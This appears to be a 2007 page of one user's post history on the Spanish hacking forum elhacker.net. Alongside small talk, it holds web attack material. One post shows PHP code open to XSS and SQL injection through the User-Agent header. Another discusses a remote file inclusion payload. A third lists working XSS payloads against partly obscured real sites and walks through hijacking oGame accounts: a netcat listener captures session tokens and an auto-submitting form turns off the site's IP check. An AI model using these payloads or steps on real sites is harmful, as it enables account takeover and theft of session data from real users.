elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ... 42
231  Informática / Tutoriales - Documentación / Re: Manual: Creando una Máquina Virtual en: 4 Mayo 2007, 02:24 am
Muy bueno, ya no tendré que abrir con el bloc de notas los archivos que resulten sospechosos...  ;D
232  Seguridad Informática / Nivel Web / Re: UserAgent XSS/SQL Injection en: 24 Abril 2007, 18:28 pm
Por $_SERVER['HTTP_REFERER'] ya vi un fallo en PHP-Nuke 6.5 pero... ¿Por IP? ¿Podrías explicar cómo?
233  Seguridad Informática / Nivel Web / UserAgent XSS/SQL Injection en: 24 Abril 2007, 12:06 pm
Estaba programando PHP y al abrir el navegador k-meleon y se me ocurrió una idea... ¿y si inyectamos código HTML en el UserAnget? o mejor aún... ¿y si hacemos SQL Injection?

XSS Injection

Código:
<?php
echo $HTTP_USER_AGENT
?>


SQL Inyection

Código:
<?php
echo "<a href='".$_SERVER['PHPSELF']."?act=1'>Registrarse</a> |
<a href='".$_SERVER['PHPSELF']."'>Listado</a><br><br>";

$act = $_GET['act'];

if ($act == 1) {
$IP=getenv("REMOTE_ADDR");
echo $HTTP_USER_AGENT;
mysql_query("Insert into browsers (UserAgent, IP) values ('$HTTP_USER_AGENT', '$IP'), $link");
} else {
echo "Listado";
$result=mysql_query("select * from browsers where UserAgent = '".$HTTP_USER_AGENT."'",$link); 
while($row = mysql_fetch_array($result)) {
echo "Tu UserAgent fue registrado con la siguiente IP: ".$row['IP']."<br>";
}
}

?>

Ejemplo práctico en http://id.ziew.info.

No se si ya se ha hablado de esto anteriormente, a mi se me ocurrió de repente, aunque supongo que a mucha gente también...

PD: Para evitar estas inyecciones usen htmlspecialchars.
234  Programación / Programación Visual Basic / Re: Bouncer en: 23 Abril 2007, 15:00 pm
¿Conoceis algún código fuente de un Bouncer que no esté orientado para el IRC? Es decir, que te puedas conectar a él con tu navegador, actuando como proxy. He creado algo parecido pero es muy engorroso, y con 3 controles winsock, si alguien tiene una idea clara sobre como hacerlo, se lo agradecería mucho.

235  Programación / Programación Visual Basic / Re: POST con Winsock + sniffeando Web... HELPMeeee!! en: 23 Abril 2007, 01:41 am
Si no nos dices lo que envias no podremos ayudarte, y si no te compromete mucho podrias decirnos la dirección para facilitarnos el trabajo.
236  Seguridad Informática / Nivel Web / Re: Ayuda con un RFI en: 22 Abril 2007, 21:59 pm
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.


Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...

Código:
<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>

allow_url_include = On
237  Foros Generales / Foro Libre / Re: Cumpleaños en: 22 Abril 2007, 13:16 pm
20 de Enero :P
238  Seguridad Informática / Nivel Web / Cross Site Scripting (XSS) en: 22 Abril 2007, 04:20 am
Cross Site Scripting (XSS)

Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..

El autor no se hace responsable de los malos usos que se le de a este documento...

Código:
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http:// s e x y o n o .com/grupos/" method="POST">
<input type="hidden" name="buscargrupo" value="
<script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>">
</form>

Código:
http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario=
<SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>&
Submit=Bloquear

Código:
http://ogameXXX.de/game/redir.php?url=
"><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>

He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto.

Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo.

Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta.

Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes.

Código:
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="options.php?session=SESSION&mode=change" method="POST" >
<input type="hidden" name="dpath" value="http://127.0.0.1/skin/">
<input type="checkbox" name="design" checked>
<input type="checkbox" name="noipcheck" checked>
</form>

Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta...

Código:
<frameset framespacing="0" border="0" cols="190,*" frameborder="0">
<frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION"
noresize marginwidth="0" marginheight="0">
<frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank">
<noframes></noframes></frameset>

Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces!  :P

PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.
239  Seguridad Informática / Nivel Web / Re: parametros "x" y "y" en envio POST en: 21 Abril 2007, 21:15 pm
Es díficil que encuentres un programa con estas características.

Si sabes programación no tendrás problemas, en caso contrario lo tienes difícil, aún así te dejo una estructura clara del programa.

Citar
Consulta al formulario para sacar los valores de 'x' e 'y'.
Brute forcing a la variable 'z', acompañado de los valores de 'x' e 'y'
Consulta al formulario para sacar los valores de 'x' e 'y'.
Brute forcing a la variable 'z', acompañado de los valores de 'x' e 'y'
...
240  Programación / PHP / Re: Unir variables en: 21 Abril 2007, 04:08 am
Gracias a todos por contestar  :P
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ... 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines